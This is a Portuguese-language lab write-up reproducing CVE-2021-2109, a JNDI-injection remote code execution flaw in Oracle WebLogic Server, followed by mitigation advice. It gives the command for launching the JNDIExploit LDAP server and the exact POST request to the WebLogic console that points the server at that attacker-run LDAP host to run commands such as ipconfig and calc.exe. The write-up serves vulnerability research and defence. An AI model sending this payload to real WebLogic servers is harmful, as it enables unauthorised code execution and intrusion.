
CVE-2021-2109 Reprodução e análise da vulnerabilidade de execução remota de código no Weblogic Server
Em janeiro de 2021, a Oracle lançou uma atualização de segurança contendo 329 novos patches de segurança em sua linha de produtos. Este anúncio menciona especificamente o boletim de segurança do Oracle WebLogic Server sobre a vulnerabilidade CVE-2020-14750, publicado em 1º de novembro de 2020. Recomenda-se fortemente que os clientes apliquem esta atualização de patch, bem como os demais patches deste boletim. O CVE-2021-2109 é uma vulnerabilidade de execução remota de código no WebLogic, causada principalmente por injeção de JNDI, permitindo que um invasor execute código remotamente.
As versões afetadas são: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0
Use o DOCKER para montar o ambiente de teste do Weblogic Server, o Weblogic Server pode ser acessado normalmente


Inicie o LDAP na máquina local. Ele pode ser baixado em https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. O comando é: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

Envie o pacote POC de injeção JNDI para a vulnerabilidade de execução remota de código CVE-2021-2109 no Weblogic Server: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

Execute o comando de sistema ipconfig por meio da variável cmd


Execute calc.exe por meio da variável cmd para abrir a calculadora do sistema


A calculadora do sistema é aberta

Recomendações de segurança para a vulnerabilidade de execução remota de código CVE-2021-2109 no Weblogic Server
Desative o protocolo T3 Se você não depende do protocolo T3 para comunicação JVM, pode mitigar o impacto desta vulnerabilidade bloqueando temporariamente o protocolo T3. 1). Acesse o console do WebLogic, na página de configuração do base_domain, vá para a aba "Segurança", clique em "Filtro" e configure o filtro. 2). No filtro de conexão, insira: weblogic.security.net.ConnectionFilterImpl; na caixa de regras do filtro de conexão, insira: * * 7001 deny t3 t3s.
Desative o IIOP Acesse o console do WebLogic, encontre a opção de habilitar o IIOP, desmarque a caixa e reinicie para que a alteração tenha efeito.
Feche temporariamente o acesso externo ao console /console/console.portal
Aplique o patch de segurança oficial